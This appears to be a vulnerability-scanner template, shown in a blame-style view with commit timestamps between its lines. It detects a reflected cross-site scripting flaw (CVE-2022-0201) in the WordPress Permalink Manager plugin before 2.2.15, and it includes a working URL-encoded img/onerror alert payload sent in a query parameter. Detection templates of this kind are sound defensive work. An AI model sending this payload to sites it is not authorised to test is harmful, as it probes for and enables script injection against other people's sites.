2022-05-05 17:02:43 +00:00
id : CVE-2022-0201
info :
2022-09-10 01:55:52 +00:00
name : WordPress Permalink Manager <2.2.15 - Cross-Site Scripting
2022-05-05 17:02:43 +00:00
author : Akincibor
2022-09-10 02:12:57 +00:00
severity : medium
2022-09-10 01:55:52 +00:00
description : |
WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page.
2022-05-05 17:02:43 +00:00
reference :
- https://wpscan.com/vulnerability/f274b0d8-74bf-43de-9051-29ce36d78ad4
2022-05-17 09:18:12 +00:00
- https://plugins.trac.wordpress.org/changeset/2656512
2022-05-05 17:04:21 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-05-17 09:18:12 +00:00
cvss-score : 6.1
2022-05-05 17:04:21 +00:00
cve-id : CVE-2022-0201
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
epss-score : 0.00112
2022-08-27 04:41:18 +00:00
tags : wp-plugin,wpscan,cve,cve2022,xss,wordpress
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2022-05-05 17:02:43 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-05-05 17:02:43 +00:00
- method : GET
path :
- '{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1'
matchers-condition : and
matchers :
- type : word
part : body
words :
- '<img src onerror=alert(/XSS/)>'
- 'pm_query'
condition : and
- type : word
part : header
words :
2022-09-10 01:55:52 +00:00
- text/html